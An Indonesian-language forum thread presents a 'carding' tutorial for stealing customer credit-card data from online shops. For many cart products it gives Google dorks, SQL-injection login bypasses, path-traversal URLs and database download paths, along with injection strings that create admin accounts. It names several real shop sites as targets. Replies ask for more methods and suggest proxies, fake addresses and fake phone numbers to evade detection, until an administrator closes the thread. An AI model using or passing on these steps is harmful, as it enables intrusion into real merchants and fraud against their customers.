Tutorial Carding.....

Discussion in 'Internet & Web' started by kevin168, Sep 7, 2007.

Thread Status:
Not open for further replies.
  1. kevin168

    kevin168 Moderator Moderator

    Messages:
    70
    Likes Received:
    71
    Trophy Points:
    0
    TUTORIAL CARDING LENGKAP



    Contoh bugs pada bentuk toko system : shopadmin


    Ketik keyword google : allinurl:/shopadmin.asp
    Contoh target : www.Target.com/shopadmin.asp
    user : 'or'1
    pass : 'or'1



    Contoh bugs pada bentuk toko sistem : Index CGI

    Ketik keyword google : allinurl:/store/index.cgi/page=
    Contoh target : www.Target.com/cgi-bin/store/index.cgi?page=short_blue.htm
    Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
    Hasilnya:www.Target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log



    Contoh bugs pada bentuk toko sistem : metacart

    Ketik keyword google.com : allinurl:/metacart/
    Contoh target : www.Target.com/metacart/about.asp
    Hapus moreinfo.asp dan ganti dengan : --> /database/metacart.mdb
    Hasilnya : /www.Target.com/metacart/database/metacart.mdb



    Contoh bugs pada bentuk toko sistem :DCShop

    Ketik keyword google.com : allinurl:/DCShop/
    Contoh : www.Target.com/xxxx/DCShop/xxxx
    Hapus /DCShop/xxxx dan ganti dengan
    /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
    Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt



    Contoh bugs pada bentuk toko sistem : EShop

    Ketik keyword google.com : allinurl:/eshop/
    Contoh : www.Target.com/xxxxx/eshop
    Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
    Hasilnya : www.Target.com/.../cg-bin/eshop/database/order.mdb
    Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)




    Contoh bugs pada bentuk toko sistem : PDshopro

    Ketik keyword google.com : allinurl:/shop/category.asp/catid=
    Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
    Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
    Hasilnya : www.Target.com/admin/dbsetup.asp
    Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
    Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
    www.Target.com/data/pdshoppro.mdb
    Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)



    Contoh bugs pada bentuk toko sistem : commerceSQL

    Ketik keyword google.com : allinurl:/commercesql/
    Contoh : www.Target.com/commercesql/xxxxx
    Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
    Hasilnya : www.Target.com/cgi-bin/commercesql/index.cgi?page=
    Untuk melihat admin config
    www.Target.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
    Untuk melihat admin manager
    www.Target.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
    Untuk melihat file log/CCnya
    www.Target.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log



    Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

    Ketik keyword google.com : allinurl:/cart32.exe/
    Contoh : www.Target.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
    Ganti NoItemFound dengan : error
    Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
    Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
    /akhiran.c32 berarti di site tsb. terdapat file berisi data cc
    Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
    Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
    Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
    http://www.Target.com/cart32/
    Contoh http://www.Target.net/wrburns_s/cgi-bin/ca...URNS-001065.c32



    Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

    Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
    Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

    Contoh :
    http://Target.com/vpasp/shopdisplayproduct...#39;a%'--

    Gantilah nilai dari string url terakhir dg:
    : %20'a%25'--
    : %20'b%25'--
    : %20'c%25'--
    Kalau berhasil, kita akan mendapatkan informasi username dan password admin
    Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
    silahkan Cari sendiri data CCnya



    Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

    Ketik keyword google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

    Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

    Keyword=&category=5); insert into tbluser (fldusername) values
    ('')--&SubCategory=&hide=&action.x=46&action.y=6

    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6

    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6

    Jangan lupa untuk mengganti dan nya terserah kamu.
    Untuk mengganti password admin, masukkan keyword berikut :

    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    Untuk login admin, ada di http://Target/vpasp/shopadmin.asp



    Contoh bugs pada bentuk toko sistem : Lobby.asp


    Ketik keyword google.com : allinurl: Lobby.asp
    Contoh : www.Target.com/mall/lobby.asp
    Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
    Hasilnya : www.Target.com/fpdb/shop.mdb



    Contoh bugs pada bentuk toko sistem : Shopper.cgi


    Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
    Contoh : www.Target.com/cgi-local/shopper.cgi/?preadd=action&key=
    Tambah dengan :...&template=order.log
    Hasilnya :
    www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template=order.log



    Contoh bugs pada bentuk toko sistem :proddetail.asp


    Ketik keyword google.com : allinurl:proddetail.asp?prod=
    Contoh : www.Target.org/proddetail.asp?prod=ACSASledRaffle
    Hapus tulisan proddtail.asp?prod=SG369
    dan ganti dengan --> fpdb/vsproducts.mdb
    Hasilnya : www.Target.org/fpdb/vsproducts.mdb




    Contoh bugs pada bentuk toko sistem :Digishop


    Ketik keyword google.com : inurl:"/cart.php?m="
    Contoh : http://Target.com/store/cart.php?m=view.
    Hapus tulisan cart.php?m=view
    dan ganti dengan -->admin
    Hasilnya http://Target.com/store/admin

    Trus masukin username sama pass nya pake statment SQL injection

    Usename : 'or"="
    Password : 'or"="

    setelah bisa login, cari data yang diperlukan .



    Contoh bugs pada bentuk toko sistem : Index CGI

    Ketik keyword google.com : allinurl:store/index.cgi/page=
    Bugs : ../admin/files/order.log
    Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
    masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log
    trus copy-paste tuch log'nya di notepad biar gampang di baca



    Contoh bugs pada bentuk toko sistem : Index Cart

    Ketik keyword google.com : inurl:"/cart.php?m="
    Bugs : Admin
    ganti tulisn cart.php?m=view dengan admin
    login pake SQl Injection :
    username :'or"="
    Passwordnya :'or"="
    contoh target buat kalian :
    https://www.therustybucket.biz/store/admin



    Contoh bugs pada bentuk toko sistem : Index cart


    Ketik keyword google.com : /ashopKart20/"
    bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
    example www.garrysun.com/ashopkart20/addprod.asp
    Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
    kalo berhasil loe dapet file beresktension .mdb nach file itu
    tmn2 open with MS-Acces



    Contoh bugs pada bentuk toko sistem : Catid

    Ketik keyword google.com : /shop/category.asp/catid=
    Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
    example : www.littlesport.net/shop/category.asp?catid=2
    masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
    kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
    dah keduluan ma carder yang lain... cari target lain ok..??



    Contoh bugs pada bentuk toko sistem : Store

    Ketik keyword google.com : inurl:"/store/proddetail.asp?prod="
    bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
    Example : http://www.successlink.org/store/pro...prod=SL-IP0001
    masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
    download file .mdbnya trus buka pake MS- ACCESS..



    Contoh bugs pada bentuk toko sistem : Sunshop

    Ketik keyword google.com : "Powered by SunShop 3.2"
    Atau google dork : inurl:"/sunshop/index.php?action="
    Bugs : ganti kata index.php dgn admin
    kl ada peringatan java script error klik "OK" aja
    Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
    ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
    Login pake SQL Injection :
    Username : admin
    Password :'or''='



    Contoh bugs pada bentuk toko sistem : digishop

    Ketik keyword google.com
    Ketik keyword google.com : "Powered by Digishop 3.2"
    Bugs : hapus tulisan cart.php?m= dengan admin
    Login pake SQL Injection :
    Username : 'or"="
    Password : 'or"="
    Contoh target :
    http://uniquescrapbooks.com.au/store/admin
    http://www.7footserb.com/shop/admin
    https://www.tangerineclothing.com/admin



    Contoh bugs pada bentuk toko sistem :Lobby

    Ketik keyword google.com : inurl:"mall/lobby.asp"
    bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
    example : Gem Depot Lobby Page - Search our Inventory
    jadi http://www.gemdepot.com/fpdb/shop.mdb
    dapat dech .mdb ===> trus klik open database JANGAN klik "convert databese" ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes....
    sabar bro... masih di table customer no 36 then klik payment





    ==================================
    ::::::::::::: SUMBER :::::::::::::
    |www.google.com and www.yahoo.com|
    ==================================
    :::::::::: H4CK-ANG3L ::::::::::::
    **********************************
    * ::: Thanks For ::: *
    * ==> www.ManadoCoding.com <== *
    * **The-Coding-Team** *
    **********************************

    br,
    kevin168
     
    crucafix likes this.
  2. Tr0_gi3

    Tr0_gi3 New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    yang baru ada bos.
    semua udah kena patch
     
  3. cool_cyber

    cool_cyber New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Ia tuh semua dh kena patch!
     
  4. TOTAL PART

    TOTAL PART Administrator Staff Member Administrator

    Messages:
    701
    Likes Received:
    837
    Trophy Points:
    103
    kan cuma contoh aja......
    ayo vin,... yg baru.............:D
     
  5. scHizopon1c

    scHizopon1c New Member

    Messages:
    93
    Likes Received:
    0
    Trophy Points:
    0
    ..sip vin..yang lain ada?..keluarin semua dunk...

    proyekan menunggu .. just 2 of us ..xi xi xi [​IMG]
     
  6. nononkvai

    nononkvai New Member

    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    itu masih bisa..kalo beruntung..gw barusan dapet 2 mdb :p
     
  7. Bad_Sector

    Bad_Sector New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Dapet database .mdb nya cuman gimana bukannya ? maklum nubi nieh
     
  8. therif

    therif New Member

    Messages:
    49
    Likes Received:
    25
    Trophy Points:
    0
    wowwwwwww...........

    Kerennnnnnnn
     
  9. slevin

    slevin New Member

    Messages:
    9
    Likes Received:
    1
    Trophy Points:
    0
    pake microsoft acces la yaw...
     
  10. dinar group

    dinar group New Member

    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    0
    klo mindahin ip addres ke luar negeri gmn bos ?
    kan sekarang indonesia diblok...:frusty:
     
  11. slevin

    slevin New Member

    Messages:
    9
    Likes Received:
    1
    Trophy Points:
    0
    coba pake hide ip bro,,,
     
  12. slevin

    slevin New Member

    Messages:
    9
    Likes Received:
    1
    Trophy Points:
    0
    jurus selanjutnya dunk, biar rame nih :D
     
  13. admin

    admin Administrator Staff Member Administrator

    Messages:
    2,397
    Likes Received:
    2,623
    Trophy Points:
    123
    -siapkan high Anonymous proxy yg support ssl, lebih sip lagi kalo ada proxy sock
    -siapkan 1 buah email berbayar (lebih mantab pake email berbayar)
    -cari teman yg pinter bahasa inggris baik lesan maupun tulis

    good luck
     
    crucafix likes this.
  14. CELLULARLABS

    CELLULARLABS Super Moderators Super Moderator

    Messages:
    207
    Likes Received:
    89
    Trophy Points:
    0

    NO COMMENT ha ha ha ha
     
  15. andra

    andra Super Moderators Super Moderator

    Messages:
    1,276
    Likes Received:
    1,413
    Trophy Points:
    123
    red : metu asline


    xixixxiiiii.......
     
  16. pakdirgo

    pakdirgo Moderator Moderator

    Messages:
    302
    Likes Received:
    151
    Trophy Points:
    53
    kurang ...
    - nmr telpon palsu..
    - alamat palsu ... :D :D :D
     
  17. TOTAL PART

    TOTAL PART Administrator Staff Member Administrator

    Messages:
    701
    Likes Received:
    837
    Trophy Points:
    103
    :D:D:D:Dmaaf, hal hal yg berbau carding dilarang dibicarakan di forum ini......
    tutup aja kali ye......, nanti banyak yg keluar perangai aslinya.:D:D:D:D
     
  18. slevin

    slevin New Member

    Messages:
    9
    Likes Received:
    1
    Trophy Points:
    0
    yup, tul sekali tuh,,, udah pada keliatan aslinya tuh,,, masa lalu brooo,,,
     
  19. udie_kidz

    udie_kidz New Member

    Messages:
    180
    Likes Received:
    53
    Trophy Points:
    0
    ooo kalian ketahuan.......
    wehhh byk cyber crime ne.. wakakakakakakakaka
     
  20. flink82

    flink82 New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    tutor cardingnya dah bagus cuman bagaimana kalo kita gak ada cardnya,misal kita cari number card and cvv secara otomatis apa memang ada softwarenya.
    ada step2 barunya gak?
     
Thread Status:
Not open for further replies.

Share This Page